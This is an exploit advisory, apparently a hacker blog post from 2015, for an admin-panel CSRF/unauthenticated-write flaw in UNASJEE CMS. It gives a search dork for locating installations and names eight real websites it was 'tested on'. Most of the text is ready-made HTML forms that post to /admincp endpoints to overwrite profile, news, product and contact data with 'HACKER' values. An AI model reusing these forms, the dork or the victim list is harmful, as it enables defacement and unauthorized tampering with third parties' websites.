UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
############################################################
Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : UNASJEE CMS
|~Affected Version : All Version
|~Vendor : http://www.unasjee.net/
|~DORK : intext:Designed & Developed by: UNASJEE
|~RISK : High
|~Date: 22.03.2015
|~Tested On : [L] Kali Linux
####################INFO################################
admin panel without login It is possible to post data
the server will accept absolute.
########################################################
Demo and Tested on;
http://turnnersports.com
http://www.badhawaind.com
http://www.cliftonintl.com
http://www.aqnaf.com
http://shanisports.com
http://tayyabgarments.com
http://www.shreentrader.com
http://www.moosaleathers.com
----------------------------------------------------------
----------------------------------------------------------
Change Profile Detai PoC
----------------------------------------------------------
<!-- Change Profile Detail -->
<body>
<form action="http://[TARGET]/admincp/updprofile.php" method="POST">
<input type="hidden" name="pfid" value="1" />
<input type="hidden" name="sFullDescription" value="HACKERRRRRRR" />
<input type="hidden" name="p1" value="HACKERRRRRRR" />
<input type="hidden" name="Submit" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------
Add News PoC
----------------------------------------------------------
<form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();">
<tr>
<td valign="top" bgcolor="E8EEF3"><strong> Title:
</strong><span class="error">*</span> </td>
<td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle">
</td>
</tr>
<tr>
<td valign="top" bgcolor="E8EEF3"><strong> Date: </strong><span class="error">*</span></td>
<td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate">
(YYYY-MM-DD)</td>
</tr>
<tr>
<td width="25%" valign="top" bgcolor="E8EEF3"><strong> News:<span class="error"> </span></strong><span class="error">*</span></td>
<td width="75%" valign="top" bgcolor="E8EEF3">
<textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td>
</tr>
<tr>
<td bgcolor="E8EEF3"> </td>
<td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td>
</tr>
</form>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
----------------------------------------------------------
Add Products PoC
----------------------------------------------------------
<td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2">
<form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();">
<tr>
<td width="29%" valign="top" bgcolor="E8EEF3"> <strong>Name:</strong></td>
<td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName">
<font color="#FF0000">*</font></td>
</tr>
<tr>
<td bgcolor="E8EEF3"> <strong>Show:</strong></td>
<td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="6%"><input name="show" type="radio" value="y" checked></td>
<td width="13%">Yes</td>
<td width="5%"><input type="radio" name="show" value="n"></td>
<td width="76%">No</td>
</tr>
</table></td>
</tr>
<tr>
<td bgcolor="E8EEF3"> <strong> Category
Image:</strong></td>
<td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile">
70 x 62 px</td>
</tr>
<tr>
<td bgcolor="E8EEF3"> </td>
<td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td>
</tr>
</form>
</table></td>
</tr>
</table></td>
</tr>
<tr>
----------------------------------------------------------
Change Contact Details PoC
----------------------------------------------------------
<form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" >
<input type="hidden" name="cid" value="1">
<table align=center width=525>
<tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white">
<td height="25" colspan=3><div align="center">Change
your Contact Detail:</div></td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%" height="25" bgcolor="#CCCCCC"> First
Contact Person:</td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Contact Person:</td>
<td width="75%">
<input name=cp1 type=text id="cp1" value="HACKER"></td>
<td width="16"> </td>
</tr>
<tr>
<td width="35%">Designation:</td>
<td width="75%">
<input name=cpd1 type=text id="cpd1" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td width="35%">Mobile:</td>
<td width="75%">
<input name=cpm1 type=text id="cpm1" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td width="35%" height="25" bgcolor="#CCCCCC"> Second
Contact Person:</td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Contact Person:</td>
<td width="75%">
<input name=cp2 type=text id="cp2" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">Designation:</td>
<td width="75%">
<input name=cpd2 type=text id="cpd2" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">Mobile:</td>
<td width="75%">
<input name=cpm2 type=text id="cpm2" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%" height="25" bgcolor="#CCCCCC"> Third
Contact Person:</td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Contact Person:</td>
<td width="75%">
<input name=cp3 type=text id="cp3" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">Designation:</td>
<td width="75%">
<input name=cpd3 type=text id="cpd3" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">Mobile:</td>
<td width="75%">
<input name=cpm3 type=text id="cpm3" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Phone I:</td>
<td width="75%">
<input name=ph1 type=text id="ph1" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td width="35%">Phone II:</td>
<td width="75%">
<input name=ph2 type=text id="ph2" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">Phone III:</td>
<td width="75%">
<input name=ph3 type=text id="ph3" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Fax I:</td>
<td width="75%">
<input name=fax1 type=text id="fax1" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">E - Mail I:</td>
<td width="75%">
<input name=email1 type=text id="email1" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td width="35%">E - Mail II:</td>
<td width="75%">
<input name=email2 type=text id="email2" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%">E - Mail II:</td>
<td width="75%">
<input name=email3 type=text id="email3" value=""></td>
<td> </td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%"> </td>
<td> </td>
</tr>
<tr>
<td width="35%">Web Site:</td>
<td width="75%">
<input name=web type=text id="web" value="HACKER"></td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>Skype:</td>
<td><input name=skype type=text id="skype" value=""></td>
<td> </td>
</tr>
<tr>
<td>Yahoo:</td>
<td><input name=yahoo type=text id="yahoo" value=""></td>
<td> </td>
</tr>
<tr>
<td>gTalk:</td>
<td><input name=gtalk type=text id="gtalk" value=""></td>
<td> </td>
</tr>
<tr>
<td>MSN:</td>
<td><input name=msn type=text id="msn" value=""></td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td width="35%"><div><strong>Asia Head Office Address:</strong></div>
<br></td>
<td width="75%">
<textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td>
<td> </td>
</tr>
<tr>
<td width="35%"><strong>Hong Kong Office Address:</strong> </td>
<td width="75%">
<textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td>
<td> </td>
</tr>
<tr>
<td><strong>Australian Office Address:</strong></td>
<td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td>
<td> </td>
</tr>
<tr>
<td width="35%"> </td>
<td width="75%">
<input type="submit" name="Submit" value="Submit">
<input name="reset" type="reset" id="reset" value="Reset"></td>
<td> </td>
</tr>
</table>
</form>
Hiç yorum yok:
Yorum Gönder